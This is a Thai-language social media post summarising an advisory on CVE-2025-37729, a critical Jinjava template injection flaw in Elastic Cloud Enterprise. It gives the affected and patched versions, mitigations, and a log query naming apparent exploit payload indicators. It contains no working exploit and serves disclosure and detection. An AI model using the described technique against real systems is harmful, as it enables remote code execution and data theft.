    🚨 “ช่องโหว่ร้ายแรงใน Elastic Cloud (CVE-2025-37729) เปิดทาง RCE ผ่าน Jinjava Template Injection — คะแนนความรุนแรง 9.1 เต็ม 10” Elastic ได้ออกประกาศเตือนเกี่ยวกับช่องโหว่ความปลอดภัยระดับวิกฤตใน Elastic Cloud Enterprise (ECE) ซึ่งได้รับรหัส CVE-2025-37729 และมีคะแนน CVSS สูงถึง 9.1 โดยช่องโหว่นี้เกิดจากการจัดการอินพุตที่ไม่ปลอดภัยในเครื่องมือ template engine ที่ชื่อว่า Jinjava ซึ่งถูกใช้ในระบบการตั้งค่าของ ECE ปัญหานี้เกิดจากการที่ Jinjava ไม่สามารถ neutralize อักขระพิเศษได้อย่างเหมาะสม ทำให้ผู้โจมตีที่มีสิทธิ์ระดับผู้ดูแลระบบ (Admin) สามารถส่งสตริงที่ออกแบบมาเฉพาะเพื่อให้ Jinjava ประมวลผลเป็นคำสั่ง และนำไปสู่การรันโค้ดบนเซิร์ฟเวอร์ (Remote Code Execution - RCE) หรือการขโมยข้อมูลที่ละเอียดอ่อน ช่องโหว่นี้ส่งผลกระทบต่อ ECE เวอร์ชัน 2.5.0 ถึง 3.8.1 และ 4.0.0 ถึง 4.0.1 โดยเฉพาะระบบที่เปิดใช้งานฟีเจอร์ Logging+Metrics ซึ่งเป็นช่องทางที่ผู้โจมตีสามารถฝัง payload และอ่านผลลัพธ์ผ่าน log ได้ Elastic ได้ออกแพตช์แก้ไขในเวอร์ชัน 3.8.2 และ 4.0.2 ซึ่งมีการปรับปรุงการประเมินตัวแปรของ Jinjava และป้องกันการใช้โครงสร้างที่ไม่ปลอดภัย พร้อมแนะนำให้ผู้ดูแลระบบตรวจสอบ log ด้วย query พิเศษ เช่น (payload.name : int3rpr3t3r or payload.name : forPath) เพื่อหาสัญญาณของการโจมตี ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-37729 มีคะแนน CVSS 9.1 ➡️ เกิดจากการจัดการอินพุตไม่ปลอดภัยใน Jinjava template engine ➡️ ผู้โจมตีที่มีสิทธิ์ Admin สามารถรันโค้ดหรือขโมยข้อมูลได้ ➡️ ส่งผลกระทบต่อ ECE เวอร์ชัน 2.5.0–3.8.1 และ 4.0.0–4.0.1 ➡️ ระบบที่เปิดใช้ Logging+Metrics เสี่ยงมากเป็นพิเศษ ➡️ Elastic ออกแพตช์ในเวอร์ชัน 3.8.2 และ 4.0.2 ➡️ มี query สำหรับตรวจสอบ log: (payload.name : int3rpr3t3r or payload.name : forPath) ➡️ แนะนำให้จำกัดสิทธิ์ Admin และปิด Logging+Metrics บน deployment ที่ไม่เชื่อถือ ✅ ข้อมูลเสริมจากภายนอก ➡️ Jinjava เป็น template engine ที่ใช้ syntax คล้าย Jinja2 ของ Python ➡️ Template Injection เป็นเทคนิคที่ใช้ฝังคำสั่งในระบบที่ประมวลผล template โดยตรง ➡️ RCE เป็นหนึ่งในช่องโหว่ที่อันตรายที่สุด เพราะเปิดทางให้ควบคุมระบบจากระยะไกล ➡️ Logging+Metrics เป็นฟีเจอร์ที่ช่วยตรวจสอบระบบ แต่หากไม่ป้องกันดีอาจกลายเป็นช่องโหว่ ➡️ การอัปเดตแพตช์ทันทีเป็นวิธีป้องกันที่ดีที่สุด https://securityonline.info/critical-elastic-cloud-flaw-cve-2025-37729-cvss-9-1-allows-rce-via-jinjava-template-injection/
    SECURITYONLINE.INFO
    Critical Elastic Cloud Flaw: CVE-2025-37729 (CVSS 9.1) Allows RCE via Jinjava Template Injection
    A Critical (CVSS 9.1) flaw (CVE-2025-37729) in Elastic Cloud Enterprise allows authenticated Admin RCE. Attackers exploit Jinjava template injection to exfiltrate data and execute commands.
    0 Comments 0 Shares 146 Views 0 Reviews
More Results